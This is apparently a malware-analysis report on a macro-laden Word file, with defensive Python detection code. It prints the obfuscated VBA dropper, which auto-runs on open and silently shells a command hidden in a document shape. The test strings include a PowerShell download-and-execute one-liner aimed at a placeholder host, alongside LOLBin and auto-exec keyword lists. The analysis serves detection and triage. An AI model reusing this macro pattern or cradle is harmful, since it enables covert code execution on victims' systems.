Verdict: MALICIOUS
Risk score: 272
Heuristics (9)

- ClamAV: Doc.Malware.Generic-6749022-0 [critical, CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Malware.Generic-6749022-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]. Document contains VBA macro code.
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]. Matched line in script: `mSEQALKzja = Shell(ArzWjwUkD + ITkKZsH + YduST, Szwvt)` (reported between its neighbours `End If` and `If (ZuUbwE <> 0 Or XOwBdiC) Then`). The command string is assembled at run time: in the preview below, `ArzWjwUkD` is read from a document shape via `Shapes(...).TextFrame.ContainingRange`, so the actual command line never appears in the macro source. The second argument `Szwvt` is declared as `Const Szwvt = 439527984 - 439527984`, i.e. 0 = vbHide, so the spawned process gets no visible window.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]. The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]. Matched line in script: `Private Sub Document_open()` (between `End Function` and `If (QvRdjwwG <> 0 Or jjpkRtY) Then`). The macro therefore runs as soon as the document is opened with macros enabled.
- Reference to PowerShell [high, SC_STR_POWERSHELL]. The macro source below contains no PowerShell string, so the reference comes from elsewhere in the document; that is consistent with the Shell command text being read from a document shape rather than being embedded in the macro.
- LOLBin token sequence in document text [high, SE_LOLBIN_RUN_COMMAND]. Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. This is a visible "run this" instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This particular URL is the DrawingML XML namespace identifier and is not a host the document contacts.
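Two of the heuristics above are proximity checks over tokens rather than signatures. The Python below is an added illustration, not the analyzer's own code, and its tool, flag and token lists are my own choices: `lolbin_run_command` implements the SE_LOLBIN_RUN_COMMAND idea (a tool name within 220 characters of a dangerous flag, verb or URL in extracted text), and `pcode_autoexec_exec` implements the OLE_VBA_PCODE_AUTOEXEC_EXEC idea (an auto-exec token and an execution token co-occurring in a raw compiled-VBA/cache stream, searched as ASCII and UTF-16LE). All sample inputs are constructed.

```python
"""Token-proximity heuristics in the spirit of SE_LOLBIN_RUN_COMMAND and
OLE_VBA_PCODE_AUTOEXEC_EXEC. Added illustration, not the analyzer's code;
the token lists are my own and deliberately short."""
import re

# Windows script/execution tool names ("LOLBins") as they appear in lure text.
TOOL_RE = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|rundll32|regsvr32|wscript|cscript|"
    r"certutil|bitsadmin|msiexec)(?:\.exe)?\b", re.I)

# "Dangerous" neighbours: a flag that starts a whitespace-separated token,
# a command verb, or a URL.
DANGER_RE = re.compile(
    r"(?<!\S)-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|"
    r"e(?:nc|ncodedcommand)?\b|ep\s+bypass|executionpolicy\s+bypass|c\b)"
    r"|\b(?:iex|invoke-expression|invoke-webrequest|downloadstring|downloadfile|"
    r"start-process|urlcache)\b"
    r"|https?://\S+", re.I)


def lolbin_run_command(text: str, window: int = 220) -> list:
    """One finding per tool name that has a dangerous flag, verb or URL within
    `window` characters of it in either direction (distance 0 if they overlap)."""
    dangers = list(DANGER_RE.finditer(text))
    findings = []
    for tool in TOOL_RE.finditer(text):
        nearest = None
        for d in dangers:
            dist = max(d.start() - tool.end(), tool.start() - d.end(), 0)
            if dist <= window and (nearest is None or dist < nearest[0]):
                nearest = (dist, d.group(0))
        if nearest is not None:
            findings.append({"tool": tool.group(1).lower(),
                             "trigger": nearest[1], "distance": nearest[0]})
    return findings


# Auto-execution entry points and execution/download names as they would be
# stored in module or _VBA_PROJECT streams even when no source is recoverable.
AUTOEXEC_TOKENS = (b"AutoOpen", b"Auto_Open", b"Document_Open", b"Workbook_Open",
                   b"AutoExec", b"AutoClose", b"Document_Close", b"Workbook_Close")
EXEC_TOKENS = (b"Shell", b"ShellExecute", b"WScript.Shell", b"CreateObject",
               b"URLDownloadToFile", b"XMLHTTP", b"CallByName")


def pcode_autoexec_exec(stream: bytes) -> dict:
    """Flag a raw stream that carries BOTH an auto-exec token and an execution
    token. Tokens are matched case-insensitively as ASCII and as UTF-16LE."""
    hay = stream.lower()                 # bytes.lower() only touches ASCII letters

    def present(tok: bytes) -> bool:
        t = tok.lower()
        return t in hay or t.decode("ascii").encode("utf-16-le") in hay

    auto = [t.decode() for t in AUTOEXEC_TOKENS if present(t)]
    execs = [t.decode() for t in EXEC_TOKENS if present(t)]
    return {"autoexec": auto, "exec": execs, "hit": bool(auto and execs)}


# Constructed sample inputs (not taken from the report).
LURE_TEXT = ("Your document is protected. To view it, press Win+R and paste:\n"
             "powershell -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
             ".DownloadString('http://example.invalid/update')\"\n")
BENIGN_TEXT = "Quarterly results attached. PowerShell training is on Thursday; see the agenda."
FAR_TEXT = "mshta" + " lorem" * 60 + " http://example.invalid/x"   # URL 361 chars away
FAKE_PCODE_STREAM = (b"\xcc\x61\xff\xff\x00\x00" + "Document_Open".encode("utf-16-le")
                     + b"\x00\x00\x0b\x00" + b"Shell" + b"\x00\x00\x13\x37"
                     + b"WScript.Shell" + b"\x00\x00")
BENIGN_PCODE_STREAM = b"\xcc\x61\x00\x00" + b"Document_Open" + b"\x00\x00" + b"MsgBox"

if __name__ == "__main__":
    for label, text in (("lure", LURE_TEXT), ("benign", BENIGN_TEXT), ("far", FAR_TEXT)):
        print(label, lolbin_run_command(text))
    print("fake p-code stream", pcode_autoexec_exec(FAKE_PCODE_STREAM))
    print("benign p-code stream", pcode_autoexec_exec(BENIGN_PCODE_STREAM))
```

The window is the knob that sets the false-positive rate: the benign sentence mentions PowerShell but has no flag, verb or URL near it, and the `FAR_TEXT` case shows the same URL being ignored at 361 characters and caught once the window is widened to 400.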
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7618 bytes |

SHA-256: 14b660e1f6a13d9b12e981bfd7f61da88645d09bda1482d814045166224f4169

Detection
- ClamAV: No threats found. (This applies to the carved macro source on its own; the parent document matched Doc.Malware.Generic-6749022-0, see above.)
- Obfuscation or payload: likely. 73 of 141 identifiers look randomly generated (e.g. 'iApVLfOOsihq'); 1 string-concatenation chain(s), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script; this module is under 200 lines, so the listing is complete):
Attribute VB_Name = "iApVLfOOsihq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function KHRhq()
Const Szwvt = 439527984 - 439527984
If (Nvzsq <> 0 Or mLaMRhz) Then
mLaMRhz = True
ViGYz = ViGYz & RhKDjH = 121417404 + 221866330
If (Nvzsq = 1) Then
ViGYz = ViGYz & wcTuj = 458039355 / YtZbDl
ViGYz = ViGYz & vnwCw = sXTaV * 483249791
ViGYz = ViGYz & EPrjlw = 534949742 * jAqiG
Else
ViGYz = ViGYz & ioYPv = 271983887 - 316278359
ViGYz = ViGYz & Cnuji = HGOOwc + 22052945
ViGYz = ViGYz & zTidh = 303741287 - 36021259
End If
End If
If (EXlUPD <> 0 Or JbmCtBW) Then
JbmCtBW = True
ntiDTS = ntiDTS & RLAvlw = 192752380 * 309002419
If (EXlUPD = 1) Then
ntiDTS = ntiDTS & BPFYu = tHcpt - RAEvu
ntiDTS = ntiDTS & TTWwi = 493920242 + 142489765
ntiDTS = ntiDTS & cAiGZ = 76837336 + URWoZ
Else
ntiDTS = ntiDTS & zVGEU = RpKBAa - QGZSi
ntiDTS = ntiDTS & Dkmvun = iHUbvc * 63673345
ntiDTS = ntiDTS & hwYPOw = hoJbzD - 249503782
End If
End If
ArzWjwUkD = Shapes(rCEFEsk + TIXUSnK + 1 + wdpzU + jIwEKr).TextFrame.ContainingRange + aLkqd + XslupEhf
If (EFhNJC <> 0 Or DitMA) Then
DitMA = True
WMOpsdDI = WMOpsdDI & uloNwn = dzfpK * XmRnBl
If (EFhNJC = 1) Then
WMOpsdDI = WMOpsdDI & KHzOhi = bwXIb * 67887169
WMOpsdDI = WMOpsdDI & JKwYw = NlAwh * 421549630
WMOpsdDI = WMOpsdDI & WrocY = cRfkm / 359711123
Else
WMOpsdDI = WMOpsdDI & afUVqh = 36183738 - XNzVMq
WMOpsdDI = WMOpsdDI & rzXrKL = 445338330 + 187581685
WMOpsdDI = WMOpsdDI & CLmdz = 199748913 * RjJfZ
End If
End If
If (zUOLqt <> 0 Or CrYjlJSc) Then
CrYjlJSc = True
QtHDT = QtHDT & mIFwL = MIwdS * 234903451
If (zUOLqt = 1) Then
QtHDT = QtHDT & NXnvkS = nmBGl + 304689503
QtHDT = QtHDT & TSjonY = 209372409 / AuhGGu
QtHDT = QtHDT & HpjZGT = EFSUJ / AjQlCT
Else
QtHDT = QtHDT & sHdUK = 386585719 / 333740662
QtHDT = QtHDT & pjTph = pkvwDb + SJONQT
QtHDT = QtHDT & jcUiwD = hpAMOO - iqlPl
End If
End If
If (wQjsuT <> 0 Or KzWWcmf) Then
KzWWcmf = True
iunabT = iunabT & ThrrJ = rEUwo / taOfzq
If (wQjsuT = 1) Then
iunabT = iunabT & IFpQBN = 498556420 - 522961306
iunabT = iunabT & DBPrzw = 49589626 * bzCADJ
iunabT = iunabT & TtBan = 115924775 + 497119922
Else
iunabT = iunabT & moQPq = mKSdRq + 68150364
iunabT = iunabT & RFppdw = 152761964 - oScMiu
iunabT = iunabT & coLopO = 358997071 - FOlAB
End If
End If
mSEQALKzja = Shell(ArzWjwUkD + ITkKZsH + YduST, Szwvt)
If (ZuUbwE <> 0 Or XOwBdiC) Then
XOwBdiC = True
njQaZsWTu = njQaZsWTu & awztW = KljQi - 428813548
If (ZuUbwE = 1) Then
njQaZsWTu = njQaZsWTu & zRzzn = NEIqE + MVnVR
njQaZsWTu = njQaZsWTu & CbaEWI = irfqsz - QfhwdZ
njQaZsWTu = njQaZsWTu & IGpPk = mhBdoU - NDhuv
Else
njQaZsWTu = njQaZsWTu & XJWhNP = Tujnpr - VuVkol
njQaZsWTu = njQaZsWTu & pwqCC = rXNwm / 500603091
njQaZsWTu = njQaZsWTu & pBwlY = ztYrAN + 5456957
End If
End If
If (IRUJLYo <> 0 Or ObvFbSk) Then
ObvFbSk = True
RBZcY = RBZcY & qTnWn = nYZSv - 508391724
If (IRUJLYo = 1) Then
RBZcY = RBZcY & JMZiLJ = wXWfT - tmpoM
RBZcY = RBZcY & PDDbB = 199251616 - 169484891
RBZcY = RBZcY & plSqq = 471695745 - cJlIY
Else
RBZcY = RBZcY & jqPYch = nUTtj + 476722948
RBZcY = RBZcY & jNDjmF = 33826745 + YMVYlF
RBZcY = RBZcY & UCJRlO = FVzqb / 394274112
End If
End If
If (kwCKV <> 0 Or pbcWL) Then
pbcWL = True
EochjHJIb = EochjHJIb & UoULH = LTomC + PENwKC
If (kwCKV = 1) Then
EochjHJIb = EochjHJIb & JhCjQZ = wwLKJ + dPbNp
EochjHJIb = EochjHJIb & zaPJh = 68084500 / oXZXU
EochjHJIb = EochjHJIb & wHiRmR = 248553025 / ElsTP
Else
EochjHJIb = EochjHJIb & icwDz = 262227463 / zIADEt
EochjHJIb = EochjHJIb & UGbCp = cbNBZ * 365197693
EochjHJIb = EochjHJIb & cJFlZ = GzBDw - 296627680
End If
End If
If (cmTiwGJXi <> 0 Or jiKswv) Then
jiKswv = True
iBlCqZIw = iBlCqZIw & prtwv = 274204505 * OFvEDf
If (cmTiwGJXi = 1) Then
iBlCqZIw = iBlCqZIw & juSTj = 302592381 / 381164844
iBlCqZIw = iBlCqZIw & uRHuc = 146529273 / 77431373
iBlCqZIw = iBlCqZIw & RMCum = 1622546 * 268726083
Else
iBlCqZIw = iBlCqZIw & LmpQR = jQEPFw * 333933572
iBlCqZIw = iBlCqZIw & rChVrk = pDBpi * 301825882
iBlCqZIw = iBlCqZIw & QoiQML = 195126619 + qstMP
End If
End If
If (jSBfMKAl <> 0 Or krKJP) Then
krKJP = True
IkziUNv = IkziUNv & nCunDz = VFPwn - 525854057
If (jSBfMKAl = 1) Then
IkziUNv = IkziUNv & BWdXw = 197990450 - 444219453
IkziUNv = IkziUNv & htZBBu = kIMhH * 39692394
IkziUNv = IkziUNv & ofNcRX = mzOlvN / AGOVLY
Else
IkziUNv = IkziUNv & NtOBtt = OBIXHV - rouMzz
IkziUNv = IkziUNv & jinGnS = 205849807 + 440740828
IkziUNv = IkziUNv & iurWi = amwaYd * XwGNn
End If
End If
End Function
Private Sub Document_open()
If (QvRdjwwG <> 0 Or jjpkRtY) Then
jjpkRtY = True
Xfkwu = Xfkwu & JtbcU = NFkzbi / IGPmD
If (QvRdjwwG = 1) Then
Xfkwu = Xfkwu & AFrVN = SoWob * oWXHj
Xfkwu = Xfkwu & UiMNi = 198886369 * 431199498
Xfkwu = Xfkwu & sJjnPz = tjuuS + 187769981
Else
Xfkwu = Xfkwu & XOWBF = RJomLi / WIRZr
Xfkwu = Xfkwu & bvdEVf = 140005566 / Wjhcu
Xfkwu = Xfkwu & EqLszc = WNmDW / EOdzb
End If
End If
If (BWsjtG <> 0 Or ZcwCmIWU) Then
ZcwCmIWU = True
nWzwkKBIU = nWzwkKBIU & isEqLj = KLzjBM * fdhTib
If (BWsjtG = 1) Then
nWzwkKBIU = nWzwkKBIU & iAICEX = dqUjO - cwUmn
nWzwkKBIU = nWzwkKBIU & JwLUK = KYSHdi + sqvrv
nWzwkKBIU = nWzwkKBIU & GMThUf = 42347204 + mIwiIu
Else
nWzwkKBIU = nWzwkKBIU & ORAXfw = 230255293 * uwqVN
nWzwkKBIU = nWzwkKBIU & JVNhFZ = jHqQrp / zBakw
nWzwkKBIU = nWzwkKBIU & CLbpYL = WMNcLG * 261821782
End If
End If
KHRhq
If (rVuKB <> 0 Or fVkbMsk) Then
fVkbMsk = True
KLPUwkQ = KLPUwkQ & JZhwa = 19916947 * thFVr
If (rVuKB = 1) Then
KLPUwkQ = KLPUwkQ & MVRiw = 386664371 + 455015450
KLPUwkQ = KLPUwkQ & bAcLr = naESjG / SrdMV
KLPUwkQ = KLPUwkQ & CvVbCV = BQSoth + 310300586
Else
KLPUwkQ = KLPUwkQ & qIPlz = DLAGbz + LYbiIv
KLPUwkQ = KLPUwkQ & tKGZZ = 204269273 / 212548949
KLPUwkQ = KLPUwkQ & zcWHPY = 425192714 * 497779227
End If
End If
End Sub
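The source-level findings above (the Document_open entry point, the Shell call, the random-identifier ratio and the concatenation-chain count) can be reproduced with a short static pass over the decoded VBA. The Python below is an added example, not the analyzer's code: the thresholds for "looks randomly generated" are my own approximation of what such a check does, the VBA keyword list is partial, and it additionally resolves the Shell window-style argument (here the `Const Szwvt`, which evaluates to 0, vbHide). The malicious input is a condensed excerpt of the preview above with the control-flow padding removed; the benign module is constructed.

```python
"""Static triage of extracted VBA source: auto-exec entry points, Shell calls
with the window-style argument resolved, random-looking identifiers and
string-concatenation chains. Added illustration, not the analyzer's code;
the 'looks random' thresholds are my own approximation."""
import re

VBA_KEYWORDS = set("""attribute function sub end if then else elseif const private
public dim as or and not true false set for next to each in with call exit do loop
while wend select case byval byref string long integer boolean variant object new
nothing is mod xor on error resume goto redim option explicit rem let me""".split())

AUTOEXEC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+"
    r"(Auto_?Open|Document_Open|Workbook_Open|AutoExec|Auto_?Close|"
    r"Document_Close|Workbook_Close|AutoExit)\b", re.I | re.M)
CONST_RE = re.compile(            # Const X = <int> [+-* <int>], the page's Szwvt pattern
    r"^\s*(?:Private\s+|Public\s+)?Const\s+(\w+)\s*=\s*(\d+)(?:\s*([-+*])\s*(\d+))?\s*$",
    re.I | re.M)
ACCUM_RE = re.compile(r"^\s*(\w+)\s*=\s*\1\s*&")      # x = x & ... accumulator
# Second argument of Shell(): vbHide = 0 means no visible window.
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}


def _code_only(line: str) -> str:
    """Blank out string literals and drop trailing ' comments."""
    return re.sub(r'"[^"]*"', '""', line).split("'", 1)[0]


def looks_random(name: str) -> bool:
    """Cheap name-mangling detector: few vowels, long consonant runs or many
    case flips. Hungarian-style prefixes on short words can trip it too."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 5:
        return False
    vowel_ratio = sum(c.lower() in "aeiou" for c in letters) / len(letters)
    flips = sum(a.islower() != b.islower() for a, b in zip(letters, letters[1:]))
    consonant_run = max((len(r) for r in re.findall(r"[^aeiouAEIOU]+", "".join(letters))),
                        default=0)
    return (vowel_ratio < 0.15 or consonant_run >= 5 or flips >= 4
            or (flips >= 2 and vowel_ratio <= 0.25))


def triage_vba(source: str) -> dict:
    consts = {}
    for name, a, op, b in CONST_RE.findall(source):
        value = int(a)
        if op:
            value = {"+": value + int(b), "-": value - int(b), "*": value * int(b)}[op]
        consts[name.lower()] = value

    idents, shell_calls, chains, run_var, run_len = {}, [], 0, None, 0
    for line in source.splitlines():
        m = re.match(r'\s*Attribute\s+VB_Name\s*=\s*"([^"]+)"', line)
        if m:                                    # module name counts as an identifier
            idents.setdefault(m.group(1).lower(), m.group(1))
            continue
        if line.lstrip().lower().startswith("attribute "):
            continue
        code = _code_only(line)
        for tok in re.findall(r"[A-Za-z_][A-Za-z0-9_]*", code):
            if tok.lower() not in VBA_KEYWORDS:
                idents.setdefault(tok.lower(), tok)
        m = re.search(r"\bShell\s*\((.*)\)", code, re.I)
        if m:
            cmd, _, style = m.group(1).rpartition(",")
            if not cmd:                          # no comma: only the command argument
                cmd, style = style, "2"          # Shell's default is vbMinimizedFocus
            style = style.strip()
            value = int(style) if style.isdigit() else consts.get(style.lower())
            shell_calls.append({"line": line.strip(), "command_expr": cmd.strip(),
                                "window_style": WINDOW_STYLES.get(value, "unresolved")})
        m = ACCUM_RE.match(code)
        var = m.group(1).lower() if m else None
        if var and var == run_var:               # chain = 3+ consecutive x = x & lines
            run_len += 1
        else:
            chains += run_len >= 3
            run_var, run_len = var, (1 if var else 0)
        if not var and code.count("&") >= 4:     # or one long literal join on a line
            chains += 1
    chains += run_len >= 3

    random_names = [n for n in idents.values() if looks_random(n)]
    return {"autoexec": AUTOEXEC_RE.findall(source), "shell_calls": shell_calls,
            "identifiers": len(idents), "random_identifiers": random_names,
            "random_ratio": len(random_names) / max(len(idents), 1),
            "concat_chains": chains}


# Condensed excerpt of the report's preview (control-flow padding removed).
MALICIOUS_EXCERPT = """\
Attribute VB_Name = "iApVLfOOsihq"
Attribute VB_Base = "1Normal.ThisDocument"
Function KHRhq()
Const Szwvt = 439527984 - 439527984
If (Nvzsq <> 0 Or mLaMRhz) Then
mLaMRhz = True
ViGYz = ViGYz & RhKDjH = 121417404 + 221866330
ViGYz = ViGYz & wcTuj = 458039355 / YtZbDl
ViGYz = ViGYz & vnwCw = sXTaV * 483249791
End If
ArzWjwUkD = Shapes(rCEFEsk + TIXUSnK + 1 + wdpzU + jIwEKr).TextFrame.ContainingRange + aLkqd + XslupEhf
mSEQALKzja = Shell(ArzWjwUkD + ITkKZsH + YduST, Szwvt)
End Function
Private Sub Document_open()
KHRhq
End Sub
"""
# Constructed benign module for comparison.
BENIGN_MODULE = """\
Attribute VB_Name = "ReportTools"
Option Explicit
Public Sub FormatReport()
    Dim lastRow As Long
    Dim title As String
    title = "Quarterly report"
    lastRow = ActiveSheet.UsedRange.Rows.Count
    Debug.Print title & " has " & lastRow & " rows"
End Sub
"""

if __name__ == "__main__":
    for label, src in (("malicious excerpt", MALICIOUS_EXCERPT), ("benign module", BENIGN_MODULE)):
        r = triage_vba(src)
        print(label, "autoexec=%s shell=%s random=%d/%d chains=%d" % (
            r["autoexec"], [c["window_style"] for c in r["shell_calls"]],
            len(r["random_identifiers"]), r["identifiers"], r["concat_chains"]))
```

On the condensed excerpt this reports `Document_open` as the entry point, one Shell call whose window style resolves to vbHide, one concatenation chain, and roughly two thirds of the 26 identifiers as random-looking, while the benign module produces none of those. The identifier scorer is the weak link: names like `TIXUSnK` slip through and Hungarian-prefixed names with few vowels can be flagged, which is why a ratio over the whole module, not a single hit, is what the report uses as evidence.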